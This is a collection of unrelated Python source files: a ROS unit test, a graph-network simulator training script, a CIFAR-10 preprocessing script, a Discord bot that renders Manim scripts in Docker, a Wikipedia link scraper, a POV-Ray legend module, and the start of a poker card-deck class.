setUp(self):\n box = BoxVolume(kdl.Vector(0, 0, 0),\n kdl.Vector(1, 1, 1))\n\n self.entity = Entity(\"12345\", \"dummy\", \"map\",\n kdl.Frame(kdl.Rotation.RPY(1, 0, 0),\n kdl.Vector(3, 3, 3)),\n None, {\"dummy_volume\": box}, None, 0)\n\n self.area = \"dummy_volume\"\n\n def test_look_at_area_looks_at_correct_point(self):\n \"\"\"Test that the robot looks at the center point of the named area, w.r.t. the frame of the entity\"\"\"\n entity_ds = ds.Designator(self.entity)\n area_ds = ds.Designator(self.area)\n\n state = LookAtArea(self.robot, entity_ds, area_ds, waittime=0)\n\n state.execute()\n\n vs = VectorStamped(0.5, 0.5, 0.5, \"12345\")\n\n self.robot.head.look_at_point.assert_called_with(vs, timeout=0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"robot_smach_states/test/test_perception.py","file_name":"test_perception.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"201883899","text":"import collections\nimport json\nimport os\nimport pickle\nimport glob\nimport re\nimport sys\n\nimport numpy as np\nimport torch\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom absl import flags\nfrom absl import app\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom gns import learned_simulator\nfrom gns import noise_utils\nfrom gns import reading_utils\nfrom gns import data_loader\nfrom gns import distribute\n\nflags.DEFINE_enum(\n 'mode', 'train', ['train', 'valid', 'rollout'],\n help='Train model, validation or rollout evaluation.')\nflags.DEFINE_integer('batch_size', 2, help='The batch size.')\nflags.DEFINE_float('noise_std', 6.7e-4, help='The std deviation of the noise.')\nflags.DEFINE_string('data_path', None, help='The dataset directory.')\nflags.DEFINE_string('model_path', 'models/', help=('The path for saving checkpoints of the model.'))\nflags.DEFINE_string('output_path', 'rollouts/', help='The path for saving outputs (e.g. rollouts).')\nflags.DEFINE_string('model_file', None, help=('Model filename (.pt) to resume from. Can also use \"latest\" to default to newest file.'))\nflags.DEFINE_string('train_state_file', 'train_state.pt', help=('Train state filename (.pt) to resume from. Can also use \"latest\" to default to newest file.'))\n\nflags.DEFINE_integer('ntraining_steps', int(2E7), help='Number of training steps.')\nflags.DEFINE_integer('nsave_steps', int(5000), help='Number of steps at which to save the model.')\n\n# Learning rate parameters\nflags.DEFINE_float('lr_init', 1e-4, help='Initial learning rate.')\nflags.DEFINE_float('lr_decay', 0.1, help='Learning rate decay.')\nflags.DEFINE_integer('lr_decay_steps', int(5e6), help='Learning rate decay steps.')\n\nflags.DEFINE_integer(\"cuda_device_number\", None, help=\"CUDA device (zero indexed), default is None so default CUDA device will be used.\")\n\nStats = collections.namedtuple('Stats', ['mean', 'std'])\n\nINPUT_SEQUENCE_LENGTH = 6 # So we can calculate the last 5 velocities.\nNUM_PARTICLE_TYPES = 9\nKINEMATIC_PARTICLE_ID = 3\n\ndef rollout(\n simulator: learned_simulator.LearnedSimulator,\n position: torch.tensor,\n particle_types: torch.tensor,\n n_particles_per_example: torch.tensor,\n nsteps: int,\n device):\n \"\"\"Rolls out a trajectory by applying the model in sequence.\n\n Args:\n simulator: Learned simulator.\n features: Torch tensor features.\n nsteps: Number of steps.\n \"\"\"\n initial_positions = position[:, :INPUT_SEQUENCE_LENGTH]\n ground_truth_positions = position[:, INPUT_SEQUENCE_LENGTH:]\n\n current_positions = initial_positions\n predictions = []\n\n for step in range(nsteps):\n # Get next position with shape (nnodes, dim)\n next_position = simulator.predict_positions(\n current_positions,\n nparticles_per_example=[n_particles_per_example],\n particle_types=particle_types,\n )\n\n # Update kinematic particles from prescribed trajectory.\n kinematic_mask = (particle_types == KINEMATIC_PARTICLE_ID).clone().detach().to(device)\n next_position_ground_truth = ground_truth_positions[:, step]\n kinematic_mask = kinematic_mask.bool()[:, None].expand(-1, current_positions.shape[-1])\n next_position = torch.where(\n kinematic_mask, next_position_ground_truth, next_position)\n predictions.append(next_position)\n\n # Shift `current_positions`, removing the oldest position in the sequence\n # and appending the next position at the end.\n current_positions = torch.cat(\n [current_positions[:, 1:], next_position[:, None, :]], dim=1)\n\n # Predictions with shape (time, nnodes, dim)\n predictions = torch.stack(predictions)\n ground_truth_positions = ground_truth_positions.permute(1, 0, 2)\n\n loss = (predictions - ground_truth_positions) ** 2\n\n output_dict = {\n 'initial_positions': initial_positions.permute(1, 0, 2).cpu().numpy(),\n 'predicted_rollout': predictions.cpu().numpy(),\n 'ground_truth_rollout': ground_truth_positions.cpu().numpy(),\n 'particle_types': particle_types.cpu().numpy(),\n }\n\n return output_dict, loss\n\n\ndef predict(device: str, FLAGS, flags, world_size):\n \"\"\"Predict rollouts.\n\n Args:\n simulator: Trained simulator if not will undergo training.\n\n \"\"\"\n metadata = reading_utils.read_metadata(FLAGS.data_path)\n simulator = _get_simulator(metadata, FLAGS.noise_std, FLAGS.noise_std, device)\n\n # Load simulator\n if os.path.exists(FLAGS.model_path + FLAGS.model_file):\n simulator.load(FLAGS.model_path + FLAGS.model_file)\n else:\n train(simulator, flags, world_size, device)\n simulator.to(device)\n simulator.eval()\n\n # Output path\n if not os.path.exists(FLAGS.output_path):\n os.makedirs(FLAGS.output_path)\n\n # Use `valid`` set for eval mode if not use `test`\n split = 'test' if FLAGS.mode == 'rollout' else 'valid'\n\n ds = data_loader.get_data_loader_by_trajectories(path=f\"{FLAGS.data_path}{split}.npz\")\n\n eval_loss = []\n with torch.no_grad():\n for example_i, (positions, particle_type, n_particles_per_example) in enumerate(ds):\n positions.to(device)\n particle_type.to(device)\n n_particles_per_example = torch.tensor([int(n_particles_per_example)], dtype=torch.int32).to(device)\n\n nsteps = metadata['sequence_length'] - INPUT_SEQUENCE_LENGTH\n # Predict example rollout\n example_rollout, loss = rollout(simulator, positions.to(device), particle_type.to(device),\n n_particles_per_example.to(device), nsteps, device)\n\n example_rollout['metadata'] = metadata\n print(\"Predicting example {} loss: {}\".format(example_i, loss.mean()))\n eval_loss.append(torch.flatten(loss))\n\n # Save rollout in testing\n if FLAGS.mode == 'rollout':\n example_rollout['metadata'] = metadata\n filename = f'rollout_{example_i}.pkl'\n filename = os.path.join(FLAGS.output_path, filename)\n with open(filename, 'wb') as f:\n pickle.dump(example_rollout, f)\n\n print(\"Mean loss on rollout prediction: {}\".format(\n torch.mean(torch.cat(eval_loss))))\n\ndef optimizer_to(optim, device):\n for param in optim.state.values():\n # Not sure there are any global tensors in the state dict\n if isinstance(param, torch.Tensor):\n param.data = param.data.to(device)\n if param._grad is not None:\n param._grad.data = param._grad.data.to(device)\n elif isinstance(param, dict):\n for subparam in param.values():\n if isinstance(subparam, torch.Tensor):\n subparam.data = subparam.data.to(device)\n if subparam._grad is not None:\n subparam._grad.data = subparam._grad.data.to(device)\n\ndef train(rank, flags, world_size, device):\n \"\"\"Train the model.\n\n Args:\n rank: local rank\n world_size: total number of ranks\n device: torch device type\n \"\"\"\n if device == torch.device(\"cuda\"):\n distribute.setup(rank, world_size, device)\n device_id = rank\n else:\n device_id = device\n\n metadata = reading_utils.read_metadata(flags[\"data_path\"])\n\n if device == torch.device(\"cuda\"):\n serial_simulator = _get_simulator(metadata, flags[\"noise_std\"], flags[\"noise_std\"], rank)\n simulator = DDP(serial_simulator.to(rank), device_ids=[rank], output_device=rank)\n optimizer = torch.optim.Adam(simulator.parameters(), lr=flags[\"lr_init\"]*world_size)\n else:\n simulator = _get_simulator(metadata, flags[\"noise_std\"], flags[\"noise_std\"], device)\n optimizer = torch.optim.Adam(simulator.parameters(), lr=flags[\"lr_init\"] * world_size)\n step = 0\n\n # If model_path does exist and model_file and train_state_file exist continue training.\n if flags[\"model_file\"] is not None:\n\n if flags[\"model_file\"] == \"latest\" and flags[\"train_state_file\"] == \"latest\":\n # find the latest model, assumes model and train_state files are in step.\n fnames = glob.glob(f'{flags[\"model_path\"]}*model*pt')\n max_model_number = 0\n expr = re.compile(\".*model-(\\d+).pt\")\n for fname in fnames:\n model_num = int(expr.search(fname).groups()[0])\n if model_num > max_model_number:\n max_model_number = model_num\n # reset names to point to the latest.\n flags[\"model_file\"] = f\"model-{max_model_number}.pt\"\n flags[\"train_state_file\"] = f\"train_state-{max_model_number}.pt\"\n\n if os.path.exists(flags[\"model_path\"] + flags[\"model_file\"]) and os.path.exists(flags[\"model_path\"] + flags[\"train_state_file\"]):\n # load model\n if device == torch.device(\"cuda\"):\n simulator.module.load(flags[\"model_path\"] + flags[\"model_file\"])\n else:\n simulator.load(flags[\"model_path\"] + flags[\"model_file\"])\n\n # load train state\n train_state = torch.load(flags[\"model_path\"] + flags[\"train_state_file\"])\n # set optimizer state\n optimizer = torch.optim.Adam(\n simulator.module.parameters() if device == torch.device(\"cuda\") else simulator.parameters())\n optimizer.load_state_dict(train_state[\"optimizer_state\"])\n optimizer_to(optimizer, device_id)\n # set global train state\n step = train_state[\"global_train_state\"].pop(\"step\")\n\n else:\n msg = f'Specified model_file {flags[\"model_path\"] + flags[\"model_file\"]} and train_state_file {flags[\"model_path\"] + flags[\"train_state_file\"]} not found.'\n raise FileNotFoundError(msg)\n\n simulator.train()\n simulator.to(device_id)\n\n if device == torch.device(\"cuda\"):\n dl = distribute.get_data_distributed_dataloader_by_samples(path=f'{flags[\"data_path\"]}train.npz',\n input_length_sequence=INPUT_SEQUENCE_LENGTH,\n batch_size=flags[\"batch_size\"],\n )\n else:\n dl = data_loader.get_data_loader_by_samples(path=f'{flags[\"data_path\"]}train.npz',\n input_length_sequence=INPUT_SEQUENCE_LENGTH,\n batch_size=flags[\"batch_size\"],\n )\n\n print(f\"rank = {rank}, cuda = {torch.cuda.is_available()}\")\n not_reached_nsteps = True\n try:\n while not_reached_nsteps:\n if device == torch.device(\"cuda\"):\n torch.distributed.barrier()\n else:\n pass\n for ((position, particle_type, n_particles_per_example), labels) in dl:\n position.to(device_id)\n particle_type.to(device_id)\n n_particles_per_example.to(device_id)\n labels.to(device_id)\n\n # TODO (jpv): Move noise addition to data_loader\n # Sample the noise to add to the inputs to the model during training.\n sampled_noise = noise_utils.get_random_walk_noise_for_position_sequence(position, noise_std_last_step=flags[\"noise_std\"]).to(device_id)\n non_kinematic_mask = (particle_type != KINEMATIC_PARTICLE_ID).clone().detach().to(device_id)\n sampled_noise *= non_kinematic_mask.view(-1, 1, 1)\n\n # Get the predictions and target accelerations.\n if device == torch.device(\"cuda\"):\n pred_acc, target_acc = simulator.module.predict_accelerations(\n next_positions=labels.to(rank),\n position_sequence_noise=sampled_noise.to(rank),\n position_sequence=position.to(rank),\n nparticles_per_example=n_particles_per_example.to(rank),\n particle_types=particle_type.to(rank))\n else:\n pred_acc, target_acc = simulator.predict_accelerations(\n next_positions=labels.to(device),\n position_sequence_noise=sampled_noise.to(device),\n position_sequence=position.to(device),\n nparticles_per_example=n_particles_per_example.to(device),\n particle_types=particle_type.to(device))\n\n # Calculate the loss and mask out loss on kinematic particles\n loss = (pred_acc - target_acc) ** 2\n loss = loss.sum(dim=-1)\n num_non_kinematic = non_kinematic_mask.sum()\n loss = torch.where(non_kinematic_mask.bool(),\n loss, torch.zeros_like(loss))\n loss = loss.sum() / num_non_kinematic\n\n # Computes the gradient of loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Update learning rate\n lr_new = flags[\"lr_init\"] * (flags[\"lr_decay\"] ** (step/flags[\"lr_decay_steps\"])) * world_size\n for param in optimizer.param_groups:\n param['lr'] = lr_new\n\n if rank == 0 or device == torch.device(\"cpu\"):\n print(f'Training step: {step}/{flags[\"ntraining_steps\"]}. Loss: {loss}.')\n # Save model state\n if step % flags[\"nsave_steps\"] == 0:\n if device == torch.device(\"cpu\"):\n simulator.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n else:\n simulator.module.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n train_state = dict(optimizer_state=optimizer.state_dict(),\n global_train_state={\"step\": step},\n loss=loss.item())\n torch.save(train_state, f'{flags[\"model_path\"]}train_state-{step}.pt')\n\n # Complete training\n if (step >= flags[\"ntraining_steps\"]):\n not_reached_nsteps = False\n break\n\n step += 1\n\n except KeyboardInterrupt:\n pass\n\n if rank == 0 or device == torch.device(\"cpu\"):\n if device == torch.device(\"cpu\"):\n simulator.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n else:\n simulator.module.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n train_state = dict(optimizer_state=optimizer.state_dict(),\n global_train_state={\"step\": step},\n loss=loss.item())\n torch.save(train_state, f'{flags[\"model_path\"]}train_state-{step}.pt')\n\n if torch.cuda.is_available():\n distribute.cleanup()\n\n\ndef _get_simulator(\n metadata: json,\n acc_noise_std: float,\n vel_noise_std: float,\n device: str) -> learned_simulator.LearnedSimulator:\n \"\"\"Instantiates the simulator.\n\n Args:\n metadata: JSON object with metadata.\n acc_noise_std: Acceleration noise std deviation.\n vel_noise_std: Velocity noise std deviation.\n device: PyTorch device 'cpu' or 'cuda'.\n \"\"\"\n\n # Normalization stats\n normalization_stats = {\n 'acceleration': {\n 'mean': torch.FloatTensor(metadata['acc_mean']).to(device),\n 'std': torch.sqrt(torch.FloatTensor(metadata['acc_std'])**2 +\n acc_noise_std**2).to(device),\n },\n 'velocity': {\n 'mean': torch.FloatTensor(metadata['vel_mean']).to(device),\n 'std': torch.sqrt(torch.FloatTensor(metadata['vel_std'])**2 +\n vel_noise_std**2).to(device),\n },\n }\n\n simulator = learned_simulator.LearnedSimulator(\n particle_dimensions=metadata['dim'],\n nnode_in=37 if metadata['dim'] == 3 else 30,\n nedge_in=metadata['dim'] + 1,\n latent_dim=128,\n nmessage_passing_steps=10,\n nmlp_layers=2,\n mlp_hidden_dim=128,\n connectivity_radius=metadata['default_connectivity_radius'],\n boundaries=np.array(metadata['bounds']),\n normalization_stats=normalization_stats,\n nparticle_types=NUM_PARTICLE_TYPES,\n particle_type_embedding_size=16,\n device=device)\n\n return simulator\n\n\ndef main(_):\n \"\"\"Train or evaluates the model.\n\n \"\"\"\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n if device == torch.device('cuda'):\n os.environ[\"MASTER_ADDR\"] = \"localhost\"\n os.environ[\"MASTER_PORT\"] = \"29500\"\n FLAGS = flags.FLAGS\n myflags = {}\n myflags[\"data_path\"] = FLAGS.data_path\n myflags[\"noise_std\"] = FLAGS.noise_std\n myflags[\"lr_init\"] = FLAGS.lr_init\n myflags[\"lr_decay\"] = FLAGS.lr_decay\n myflags[\"lr_decay_steps\"] = FLAGS.lr_decay_steps\n myflags[\"batch_size\"] = FLAGS.batch_size\n myflags[\"ntraining_steps\"] = FLAGS.ntraining_steps\n myflags[\"nsave_steps\"] = FLAGS.nsave_steps\n myflags[\"model_file\"] = FLAGS.model_file\n myflags[\"model_path\"] = FLAGS.model_path\n myflags[\"train_state_file\"] = FLAGS.train_state_file\n\n if FLAGS.mode == 'train':\n # If model_path does not exist create new directory.\n if not os.path.exists(FLAGS.model_path):\n os.makedirs(FLAGS.model_path)\n\n # Train on gpu \n if device == torch.device('cuda'):\n world_size = torch.cuda.device_count()\n print(f\"world_size = {world_size}\")\n distribute.spawn_train(train, myflags, world_size, device)\n\n # Train on cpu \n else:\n rank = None\n world_size = 1\n train(rank, myflags, world_size, device)\n\n elif FLAGS.mode in ['valid', 'rollout']:\n # Set device\n world_size = torch.cuda.device_count()\n if FLAGS.cuda_device_number is not None and torch.cuda.is_available():\n device = torch.device(f'cuda:{int(FLAGS.cuda_device_number)}')\n predict(device, FLAGS, flags=myflags, world_size=world_size)\n\n\nif __name__ == '__main__':\n app.run(main)\n","sub_path":"gns/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"235815477","text":"import os\nimport argparse\nfrom csv import DictReader\nimport json\n\n# ONE_TRAIN_FILE = True\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-alpha',\n required=True,\n type=float,\n choices=[0.00, 0.05, 0.10, 0.20, 0.50, 1.00, 10.00, 10.00, 100.00])\n return parser.parse_args()\n\ndef save_as_json_file(filename, data):\n with open(filename, 'w+') as fp:\n json.dump(data, fp)\n\ndef parse_file_information(file_path, train=True):\n dictionary = {\"users\": [], \"num_samples\": [], \"user_data\": {}}\n user_data = {}\n n_users = 100 # start assigning user_id from 100 for test users\n with open(file_path, 'r') as file:\n reader = DictReader(file)\n next(reader) # skip header\n for line in reader:\n if train:\n user_id = int(line['user_id'])\n else:\n user_id = n_users\n filename = line['filename']\n filename = filename.split('/')[-1]\n if not train:\n filename = '/test/' + filename\n print(filename)\n class_id = int(line['class'])\n if user_id not in dictionary[\"users\"]:\n dictionary[\"users\"].append(user_id)\n if user_id not in user_data:\n user_data[user_id] = {'x': [], 'y': []}\n user_data[user_id]['x'].append(filename)\n user_data[user_id]['y'].append(class_id)\n\n for user in dictionary[\"users\"]:\n dictionary[\"user_data\"][user] = user_data[user]\n dictionary[\"num_samples\"].append(len(user_data[user]['y']))\n\n return dictionary\n\ndef parse_file(csv_path, dir_path, train=True, alpha=None):\n if train and alpha is not None:\n if alpha == 0.05:\n f = 'federated_train_alpha_' + str(alpha) + '.csv'\n else:\n f = 'federated_train_alpha_' + str(alpha) + '0.csv'\n elif not train:\n f = 'test.csv'\n print(\"Parsing file \", f)\n file_path = os.path.join(csv_path, f)\n dictionary = parse_file_information(file_path, train)\n f_name = f[:-4] + '.json'\n json_path = os.path.join(dir_path, f_name)\n save_as_json_file(json_path, dictionary)\n\n\ndef main():\n args = parse_args()\n alpha = args.alpha\n assert alpha in [0.00, 0.05, 0.10, 0.20, 0.50, 1.00, 10.00, 10.00, 100.00]\n csv_path = os.path.join('.', 'cifar10_with_name')\n if not os.path.exists(csv_path):\n print(\"Launch program in /FedAvg_pytorch/data/cifar10/preprocessing/\")\n exit(0)\n\n # Create train and test directories to store json files\n train_data_dir = os.path.join('..', 'data', 'train')\n test_data_dir = os.path.join('..', 'data', 'test')\n if not os.path.exists(train_data_dir):\n os.makedirs(train_data_dir)\n if not os.path.exists(test_data_dir):\n os.makedirs(test_data_dir)\n\n # Read files and save them as json in the required format\n parse_file(csv_path, train_data_dir, alpha=alpha)\n parse_file(csv_path, test_data_dir, train=False)\n\n\nif __name__ == '__main__':\n main()","sub_path":"data/cifar10/preprocessing/data_to_json.py","file_name":"data_to_json.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"335437392","text":"import asyncio\nimport discord\nimport docker\nimport os\nimport tempfile\nimport re\nimport io\n\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\ndockerclient = docker.from_env()\n\nbot = commands.Bot(\n command_prefix=\"!\",\n description=\"I render simple Manim Scripts.\",\n case_insensitive=False\n)\n\n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Game(name='The Waiting Game'))\n print(f'Logged in as {bot.user.name}')\n return\n\n@bot.command()\nasync def mhelp(ctx):\n await ctx.send(\"\"\"A simple Manim rendering bot.\n\nUse the `!manimate` command to render short and simple Manim scripts.\nCode **must** be properly formatted and indented. Note that you can't animate through DM's.\n\nSupported tags:\n```\n -t, --transparent, -i, --save_as_gif, -s, --save_last_frame\n```\nExample:\n```\n!manimate -s\n\\`\\`\\`py\ndef construct(self):\n self.play(ReplacementTransform(Square(), Circle()))\n\\`\\`\\`\n```\n\"\"\")\n\n@bot.command(aliases=['m'])\n@commands.guild_only()\nasync def manimate(ctx, *, arg):\n\n def construct_reply(arg):\n if arg.startswith('```'): # empty header\n arg = '\\n' + arg\n header, *body = arg.split('\\n')\n\n cli_flags = header.split()\n allowed_flags = [\n \"-i\", \"--save_as_gif\",\n \"-s\", \"--save_last_frame\",\n \"-t\", \"--transparent\"\n ]\n if not all([flag in allowed_flags for flag in cli_flags]):\n reply_args = {\"content\": \"You cannot pass CLI flags other than \"\n \"`-i` (`--save_as_gif`), `-s` (`--save_last_frame`), \"\n \"`-t` (`--transparent`).\"}\n return reply_args\n else:\n cli_flags = ' '.join(cli_flags)\n\n body = '\\n'.join(body).strip()\n\n if body.count('```') != 2:\n reply_args = {\n \"content\": 'Your message is not properly formatted. '\n 'Your code has to be written in a code block, like so:\\n'\n '\\\\`\\\\`\\\\`py\\nyour code here\\n\\\\`\\\\`\\\\`'\n }\n return reply_args\n\n script=re.search(\n pattern = r\"```(?:py)?(?:thon)?(.*)```\",\n string = body,\n flags=re.DOTALL,\n ).group(1)\n script = script.strip()\n\n # for convenience: allow construct-only:\n if script.startswith('def construct(self):'):\n script = ['class Manimation(Scene):'] + [\" \" + line for line in script.split(\"\\n\")]\n else:\n script = script.split(\"\\n\")\n\n script = [\"from manim import *\"] + script\n\n # write code to temporary file (ideally in temporary directory)\n with tempfile.TemporaryDirectory() as tmpdirname:\n scriptfile = Path(tmpdirname) / 'script.py'\n with open(scriptfile, 'w', encoding='utf-8') as f:\n f.write('\\n'.join(script))\n try: # now it's getting serious: get docker involved\n reply_args = None\n container_stderr = dockerclient.containers.run(\n image=\"manimcommunity/manim:stable\",\n volumes={tmpdirname: {'bind': '/manim/', 'mode': 'rw'}},\n command=f\"timeout 120 manim -qm --disable_caching --progress_bar=none -o scriptoutput {cli_flags} /manim/script.py\",\n user=os.getuid(),\n stderr=True,\n stdout=False,\n remove=True\n )\n if container_stderr:\n if len(container_stderr.decode('utf-8')) <= 1200:\n reply_args = {\n \"content\": \"Something went wrong, here is \"\n \"what Manim reports:\\n\"\n f\"```\\n{container_stderr.decode('utf-8')}\\n```\"\n }\n else:\n reply_args = {\n \"content\": \"Something went wrong, here is \"\n \"what Manim reports:\\n\",\n \"file\": discord.File(\n fp=io.BytesIO(container_stderr),\n filename=\"Error.log\",\n )\n }\n\n return reply_args\n\n except Exception as e:\n reply_args = {\"content\": f\"Something went wrong: ```{e}```\"}\n raise e\n finally:\n if reply_args:\n return reply_args\n\n try:\n [outfilepath] = Path(tmpdirname).rglob('scriptoutput.*')\n except Exception as e:\n reply_args = {\"content\": \"Something went wrong: no (unique) output file was produced. :cry:\"}\n raise e\n else:\n reply_args = {\"content\": \"Here you go:\", \"file\": discord.File(outfilepath)}\n finally:\n return reply_args\n\n async def react_and_wait(reply):\n await reply.add_reaction(\"\\U0001F5D1\") # Trashcan emoji\n\n def check(reaction, user):\n return str(reaction.emoji) == '\\U0001F5D1' and user == ctx.author\n\n try:\n reaction, user = await bot.wait_for('reaction_add', check=check, timeout=60.0)\n except asyncio.TimeoutError:\n await reply.remove_reaction(\"\\U0001F5D1\", bot.user)\n else:\n await reply.delete()\n\n async with ctx.typing():\n reply_args = construct_reply(arg)\n reply = await ctx.reply(**reply_args)\n\n await react_and_wait(reply)\n return\n\n\n@bot.command()\n@commands.guild_only()\nasync def mdoc(ctx, *args):\n if len(args) == 0:\n await ctx.reply(\n \"Pass some manim function or class and I will find the \"\n \"corresponding documentation for you. Example: `!mdoc Square`\"\n )\n return\n\n arg = args[0]\n if not arg.isidentifier():\n await ctx.reply(f\"`{arg}` is not a valid identifier, no class or function can be named like that.\")\n return\n\n try:\n container_output = dockerclient.containers.run(\n image=\"manimcommunity/manim:stable\",\n command=f\"\"\"timeout 10 python -c \"import manim; assert '{arg}' in dir(manim); print(manim.{arg}.__module__ + '.{arg}')\" \"\"\",\n user=os.getuid(),\n stderr=False,\n stdout=True,\n detach=False,\n remove=True\n )\n except docker.errors.ContainerError as e:\n if 'AssertionError' in e.args[0]:\n await ctx.reply(f\"I could not find `{arg}` in our documentation, sorry.\")\n return\n await ctx.reply(f\"Something went wrong: ```{e.args[0]}```\")\n return\n \n fqname = container_output.decode(\"utf-8\").strip().splitlines()[2]\n url = f\"https://docs.manim.community/en/stable/reference/{fqname}.html\"\n await ctx.reply(f\"Here you go: {url}\")\n return\n \n\nbot.run(TOKEN, bot=True, reconnect=True)\n","sub_path":"DiscordManimator.py","file_name":"DiscordManimator.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47546341","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport datetime\nimport random\nimport re\nimport ssl\n\ncontext = ssl._create_unverified_context()\nheader = {\"User-Agent\":\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Mobile Safari/537.36\"}\n\nrandom.seed(datetime.datetime.now())\ndef getlinks(articleUrl):\n url = (\"https://en.wikipedia.org\"+articleUrl)\n request = urllib.request.Request(url, headers=header)\n print(url)\n html = urllib.request.urlopen(request, context=context)\n\n bsObj = BeautifulSoup(html, 'lxml')\n return bsObj.find(\"div\", {\"id\":\"bodyContent\"}).find_all(\"a\", herf=re.compile(\"^(/wiki/)((?!:).)*$\"))\nlinks = getlinks(\"/wiki/Kevin_Becon\")\nwhile len(links) > 0:\n newArticle = links[random.randint(0, len(links) - 1)].attrs[\"href\"]\n print(newArticle)\n links = getlinks(newArticle)","sub_path":"pythonwikiWord.py","file_name":"pythonwikiWord.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206309096","text":"#!/usr/bin/env python\n\n\"\"\"\ncontains a single function ('legend')\nto make an importable legend for use in other programs.\n\nThis function stores all objects to render in dictionaries and makes for a importable legend to use in combined.py\n\"\"\"\n\n__author__ = \"wesley rorije\"\n__version__ = \"1.0\"\n\nfrom vapory import Cylinder, Cone, Pigment, Texture, Finish, Scene, LightSource, Camera\nfrom pypovray import pypovray, pdb, models, load_config\n\n\ndef legend(start_position, axis_length):\n \"\"\" Legend function for calling importable legend\"\"\"\n\n # Reduce the AXIS_LENGTH by the length of the Cone (1) so that\n # the total length is exactly the AXIS_LENGTH\n axis_length -= 1\n\n # Initialize the Cylinder END-position to a COPY of the start position\n cylinder_coords_end = {\n 'x': list(start_position),\n 'y': list(start_position),\n 'z': list(start_position)\n }\n\n # Add the AXIS_LENGTHs to the corresponding coordinate\n cylinder_coords_end['x'][0] += axis_length\n cylinder_coords_end['y'][1] += axis_length\n cylinder_coords_end['z'][2] += axis_length\n\n # creation of the Cylinders\n\n style = Texture(Pigment('color', [0.80, 0.00, 1.00], 'filter', 0.7),\n Finish('phong', 0.6, 'reflection', 0.4))\n linex = Cylinder(start_position, cylinder_coords_end['x'], 0.1, style)\n liney = Cylinder(start_position, cylinder_coords_end['y'], 0.1, style)\n linez = Cylinder(start_position, cylinder_coords_end['z'], 0.1, style)\n\n cylinders = {\n 'x': linex,\n 'y': liney,\n 'z': linez\n }\n\n # Cone START is the same as the Cylinder END, so we COPY these lists\n cones_coords_start = {\n 'x': list(cylinder_coords_end['x']),\n 'y': list(cylinder_coords_end['y']),\n 'z': list(cylinder_coords_end['z'])\n }\n\n # Copy the START as END coordinate\n cones_coords_end = {\n 'x': list(cones_coords_start['x']),\n 'y': list(cones_coords_start['y']),\n 'z': list(cones_coords_start['z'])\n }\n\n # Extend the tip of the cones with length 1\n cones_coords_end['x'][0] += 1\n cones_coords_end['y'][1] += 1\n cones_coords_end['z'][2] += 1\n\n # Creation of the Cones\n\n conex = Cone(cones_coords_start['x'], 0.5, cones_coords_end['x'], 0, style)\n coney = Cone(cones_coords_start['y'], 0.5, cones_coords_end['y'], 0, style)\n conez = Cone(cones_coords_start['z'], 0.5, cones_coords_end['z'], 0, style)\n\n cones = {\n 'x': conex,\n 'y': coney,\n 'z': conez\n }\n\n # Add ALL objects to a LIST and return\n legend_objects = list(cylinders.values()) + list(cones.values())\n\n return legend_objects\n\n\ndef frame(step):\n \"\"\" Creates a Lightsource a default Camera and calls the Shape function and places this in a scene \"\"\"\n lichtje = LightSource([2, 8, -5], 5.0)\n default_camera = Camera('location', [-5, 8, -20], 'look_at', [-5, 0, -5])\n shapes = legend([-15, 0, 0], 5)\n # Return the Scene object for rendering\n return Scene(default_camera,\n objects=[lichtje] + shapes)\n\n\nif __name__ == '__main__':\n \"\"\" Main function for rendering Legend function on its own \"\"\"\n pypovray.render_scene_to_png(frame)\n","sub_path":"assignment2a.py","file_name":"assignment2a.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"377588642","text":"# -*- coding: utf-8 -*-\n\nimport random\nfrom tkinter import *\n\nclass CardDeck:\n \n def __init__(self):\n self.heads = set([\"A\",\"K\",\"Q\",\"J\",\"T\",\"9\",\"8\",\"7\",\"6\",\"5\",\"4\",\"3\",\"2\"])\n self.colors = set([\"s\",\"c\",\"h\",\"d\"])\n self.cardsInDeck = {a+b for a in self.heads for b in self.colors}\n self.handValue = {2:\"2\",3:\"3\",4:\"4\",5:\"5\",6:\"6\",7:\"7\",8:\"8\",9:\"9\",10:\"T\",11:\"J\",12:\"Q\",13:\"K\",14:\"A\"}\n self.heroPoketHand = []\n self.board = []\n self.cardsMatrix = []\n self.buttons = []\n self.createCardFilter()\n \n def generateHeroCards(self):\n (a,b) = random.sample(self.cardsInDeck, 2)\n self.cardsInDeck.remove(a)\n self.cardsInDeck.remove(b)\n self.heroPoketHand.append(a)\n self.heroPoketHand.append(b)\n return self.heroPoketHand\n \n def generateFlop(self):\n (a,b,c) = random.sample(self.cardsInDeck, 3)\n self.cardsInDeck.remove(a)\n self.cardsInDeck.remove(b)\n self.cardsInDeck.remove(c)\n self.board.append(a)\n self.board.append(b)\n self.board.append(c)\n return self.board\n 